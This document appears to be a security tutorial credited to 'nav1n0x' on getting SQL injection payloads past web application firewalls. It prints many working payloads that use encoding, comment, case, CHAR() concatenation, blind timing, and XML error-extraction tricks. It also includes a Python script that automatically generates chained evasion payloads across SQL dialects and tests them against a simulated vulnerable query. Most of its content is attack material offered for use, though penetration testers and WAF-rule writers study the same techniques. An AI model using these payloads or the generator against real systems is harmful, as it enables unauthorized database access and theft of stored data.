Advanced SQL Injection Techniques by nav1n0x

WAF Bypass Techniques for SQL Injection

Below are various methods for getting SQL injection payloads past a web application firewall (WAF). Each technique takes advantage of a different obfuscation, encoding, or manipulation strategy so that the payload no longer matches the signatures the WAF inspects, while still parsing as the same SQL once it reaches the database. Two caveats apply throughout. Most of the function calls below (VERSION(), DATABASE(), IF(), SLEEP(), FROM_BASE64(), EXTRACTVALUE()) are MySQL; the payloads built with || concatenation assume a database where || is string concatenation (PostgreSQL, Oracle, SQLite), because in MySQL || is logical OR unless the PIPES_AS_CONCAT mode is enabled, so use CONCAT() there. And a MySQL -- comment must be followed by whitespace, so when the application appends a closing quote after the injected value, terminate the payload with "-- -" or "#" rather than a bare "--".

1. Using Encoding and Obfuscation

URL Encoding

  • Percent-encode the quote, spaces, and other characters of the payload. The web server decodes the parameter before it reaches the query, so this only gets past a filter that matches on the raw request bytes; most WAFs decode once before inspecting.

%27%20UNION%20SELECT%20NULL,NULL,NULL--

Double URL Encoding

  • Encode the payload twice, so that the % character itself becomes %25. A WAF that decodes once sees %27 and %20 rather than a quote and a space. The injection only fires, however, if the application decodes the parameter a second time before using it (for example, a framework that URL-decodes an already-decoded value); otherwise the database receives the still-encoded text as a harmless literal.

%2527%2520UNION%2520SELECT%2520NULL,NULL,NULL--

Hex Encoding

  • Write string values as hexadecimal literals so the payload contains no quote characters for the WAF to match on. MySQL treats such a literal as the string it encodes: 0x61646D696E is 'admin' and 0x70617373776F7264 is 'password'.

' UNION SELECT 0x61646D696E, 0x70617373776F7264 --

2. Case Manipulation and Comments

Mixed Case

  • Change the case of SQL keywords. Every major database treats keywords case-insensitively, so this only defeats a filter that matches case-sensitively; a WAF that lower-cases the input before matching is unaffected.

' uNioN SeLecT NULL, NULL --

Inline Comments

  • Insert inline comments between SQL keywords in place of whitespace, so the exact "UNION SELECT" pattern a signature looks for never appears. The comment cannot go inside a keyword (UN/**/ION does not parse as UNION); in MySQL the version-conditional form /*!50000SELECT*/ is a common variant, since the server executes its contents while a naive filter treats it as a comment.

' UNION/**/SELECT/**/NULL,NULL --

3. Whitespace and Special Characters

Using Different Whitespace Characters

  • Replace spaces with other whitespace characters, such as tabs (%09) or newlines, to defeat filters that look for keywords separated by an ordinary space. The example below uses CR LF (%0D%0A); which characters the parser accepts as whitespace varies by database.

' UNION%0D%0ASELECT%0D%0A NULL,NULL --

Concatenation with Special Characters

  • Build string values from character codes and concatenate them, so the payload contains no quoted literals at all. CHAR(117)||CHAR(115)||CHAR(101)||CHAR(114) is 'user' and CHAR(112)||CHAR(97)||CHAR(115)||CHAR(115) is 'pass'. This form works as written in SQLite; PostgreSQL and Oracle spell the function CHR(), MySQL takes all the codes in one call (CHAR(117,115,101,114)), and SQL Server concatenates with +.

' UNION SELECT CHAR(117)||CHAR(115)||CHAR(101)||CHAR(114), CHAR(112)||CHAR(97)||CHAR(115)||CHAR(115) --

4. SQL Function and Command Obfuscation

String Concatenation

  • Break a string into smaller literals and concatenate them, so that a blacklisted word such as 'admin' never appears contiguously in the request (CONCAT('ad','min') in MySQL).

' UNION SELECT 'ad'||'min', 'pa'||'ss' --

Using SQL Functions

  • Wrap values in built-in functions instead of quoting them; combined with CONCAT() and CHAR(), this lets a payload avoid literal strings entirely. The example itself is a plain fingerprinting query using MySQL's VERSION() and DATABASE(), the kind of query the techniques above are used to smuggle past the WAF.

' UNION SELECT VERSION(), DATABASE() --

5. Time-Based and Boolean-Based Payloads

Time-Based Blind SQL Injection

  • Use a conditional delay so the truth of a condition can be inferred from the response time. Blind payloads avoid the UNION SELECT pattern entirely, which matters when that is what the WAF blocks, though SLEEP() and BENCHMARK() are themselves commonly signatured.

' AND IF(1=1, SLEEP(5), 0) --

Boolean-Based Blind SQL Injection

  • Use a conditional expression so the page content differs for true and false conditions. The example is the true case; substituting a false condition (1=2) gives the baseline response to compare against.

' AND IF(1=1, 'A', 'B')='A' --

6. Advanced Encoding Techniques

Base64 Encoding

  • Encode string values in Base64 and decode them in the query with FROM_BASE64() (MySQL 5.6 and later), so the value never appears in clear in the request. FROM_BASE64() only decodes data; it does not execute it. The example below therefore returns the literal text 'select version()' as a column value, not the server version. The technique is useful for hiding a literal such as a table name, file path, or comparison value from keyword filters, not for smuggling a whole statement.

' UNION SELECT FROM_BASE64('c2VsZWN0IHZlcnNpb24oKQ==') --

Custom Encoding Scripts

  • Write small scripts that apply and combine these encodings automatically rather than hand-crafting each variant. The value of a script is that it can regenerate a payload in several forms (single and double URL encoding, CHAR() or hex literals, comments in place of spaces) and verify, by decoding the result, exactly what the database will receive.

7. Chaining Techniques

Combining Multiple Bypass Techniques

  • Combine several of the techniques above in one payload. The example below URL-encodes the quote, spaces, and pipe characters, replaces the spaces around SELECT with inline comments, and builds the string values from CHAR() codes; decoded, it is the ' UNION/**/SELECT/**/CHAR(117)||... query for 'user', 'pass' from section 3.

%27%20UNION/**/SELECT/**/CHAR(117)%7C%7CCHAR(115)%7C%7CCHAR(101)%7C%7CCHAR(114),%20CHAR(112)%7C%7CCHAR(97)%7C%7CCHAR(115)%7C%7CCHAR(115)%20--%0A
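The transforms in sections 1 to 4 compose, and writing them as a script makes it clear which ones actually change what the database receives. The following Python is an added example, not code from the original page; every function name in it is mine, and the in-memory SQLite table it uses to simulate a vulnerable query is constructed for the demonstration. It builds the chained payload above from a plain UNION SELECT, handles the dialect differences in string concatenation (|| for SQLite, PostgreSQL and Oracle; CHAR(a,b,c) and CONCAT() for MySQL; + for SQL Server), and shows the double-encoding failure mode: against an application that decodes only once, the double-encoded payload arrives as a harmless literal.

```python
"""Payload mutator for the WAF-evasion transforms described on this page.

Added example, not code from the original page: every function name here is
mine. Each transform takes a SQL fragment and returns an equivalent that no
longer matches a naive 'UNION SELECT' / quote-character signature.
"""
import re
import sqlite3
from urllib.parse import quote, unquote

# Keywords most signatures key on; the case and comment transforms target these.
KEYWORDS = ("UNION", "SELECT", "FROM", "WHERE", "AND", "OR", "NULL")
_KW_RE = re.compile(r"\b(" + "|".join(KEYWORDS) + r")\b", re.IGNORECASE)
_LIT_RE = re.compile(r"'([^']*)'")  # simple 'quoted' literals, no escaped quotes


def url_encode(payload: str, safe: str = "") -> str:
    """Section 1: percent-encode everything except unreserved characters."""
    return quote(payload, safe=safe)


def double_url_encode(payload: str) -> str:
    """Section 1: encode twice, so '%' itself becomes '%25'."""
    return quote(quote(payload, safe=""), safe="")


def decode_n(payload: str, times: int) -> str:
    """Undo percent-encoding TIMES times: what the server sees after N decodes."""
    for _ in range(times):
        payload = unquote(payload)
    return payload


def hex_literal(literal: str) -> str:
    """Section 1: MySQL hex string literal, no quote characters needed."""
    return "0x" + literal.encode("utf-8").hex().upper()


def mixed_case(payload: str) -> str:
    """Section 2: alternate the case of each keyword (UNION -> uNiOn)."""
    def recase(m):
        return "".join(c.lower() if i % 2 == 0 else c.upper()
                       for i, c in enumerate(m.group(0)))
    return _KW_RE.sub(recase, payload)


def comment_whitespace(payload: str) -> str:
    """Section 2: replace each run of spaces with an empty inline comment."""
    return re.sub(r" +", "/**/", payload)


def char_concat(literal: str, dialect: str) -> str:
    """Sections 3/4: build a string from character codes in the dialect's syntax."""
    codes = [ord(c) for c in literal]
    if dialect == "mysql":
        return "CHAR(" + ",".join(str(c) for c in codes) + ")"
    if dialect == "mssql":
        return "+".join(f"CHAR({c})" for c in codes)
    if dialect in ("postgresql", "oracle"):
        return "||".join(f"CHR({c})" for c in codes)
    if dialect == "sqlite":
        return "||".join(f"CHAR({c})" for c in codes)
    raise ValueError(f"unknown dialect {dialect!r}")


def split_literal(literal: str, size: int, dialect: str) -> str:
    """Section 4: split a string into SIZE-character pieces and concatenate."""
    parts = [f"'{literal[i:i + size]}'" for i in range(0, len(literal), size)]
    if dialect == "mysql":
        return "CONCAT(" + ",".join(parts) + ")"
    if dialect == "mssql":
        return "+".join(parts)
    return "||".join(parts)


def obfuscate_literals(body: str, dialect: str) -> str:
    """Rewrite every 'quoted' literal in BODY as a CHAR()/CHR() expression."""
    return _LIT_RE.sub(lambda m: char_concat(m.group(1), dialect), body)


def chain(body: str, dialect: str = "sqlite",
          prefix: str = "' ", suffix: str = " -- -") -> str:
    """Section 7: compose the transforms as the combined payload does, then
    URL-encode once for transport, leaving / * ( ) , unencoded as that payload
    does. PREFIX closes the application's quoted string; SUFFIX comments out
    whatever the application appends after the injected value."""
    step = obfuscate_literals(body, dialect)
    step = comment_whitespace(step)
    step = mixed_case(step)
    return url_encode(prefix + step + suffix, safe="/*(),")


def run_through_vulnerable_query(encoded_param: str) -> list:
    """Simulate a vulnerable application: URL-decode the parameter once, splice
    it into a query string and run it on a constructed in-memory SQLite table.
    The return value is what the database really produced for that encoding."""
    user_input = decode_n(encoded_param, 1)
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'admin')")  # constructed row
    query = "SELECT name, role FROM users WHERE name = '" + user_input + "'"
    return conn.execute(query).fetchall()


if __name__ == "__main__":
    body = "UNION SELECT 'user', 'pass'"
    encoded = chain(body)
    print(encoded)
    print(decode_n(encoded, 1))
    print(run_through_vulnerable_query(encoded))
    # Double encoding only fires if the app decodes twice; with one decode the
    # still-encoded text is compared as a plain literal and nothing is injected.
    print(run_through_vulnerable_query(double_url_encode("' " + body + " -- -")))
```

Run as a script it prints the chained payload, its once-decoded form, the rows the simulated query returns for it, and the empty result for the double-encoded variant. The dialect argument matters: the || form this page uses is the SQLite, PostgreSQL and Oracle spelling, and the same payload against MySQL needs the CHAR(117,115,101,114) form that char_concat("user", "mysql") produces.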

8. Leveraging Lesser-Known SQL Features

Using JSON Functions

  • Use JSON functions (json_extract() in MySQL 5.7 and later, and in SQLite) to pull individual values out of JSON columns. column_name and table_name below are placeholders. The point is that newer functions are often missing from WAF rulesets written around the classic keyword list.

' UNION SELECT json_extract(column_name, '$.key') FROM table_name --

Using XML Functions

  • Use XML functions for error-based extraction: MySQL's EXTRACTVALUE() raises an XPath error whose message echoes the malformed expression, so a SQL function's result placed inside that expression is reflected back in the error. The XPath argument must be built with concat() so the function is evaluated; passing the text 'version()' as a quoted string would only produce an XPath syntax error without the version.

' UNION SELECT extractvalue(1, concat(0x7e, version())) --

These techniques are ways of changing the form of a payload without changing what the database executes. Whether any of them works against a given WAF depends on how that WAF normalizes input (URL decoding, case folding, comment stripping) before matching, so test each variant and confirm, by decoding it yourself, what the application actually passes to the database.
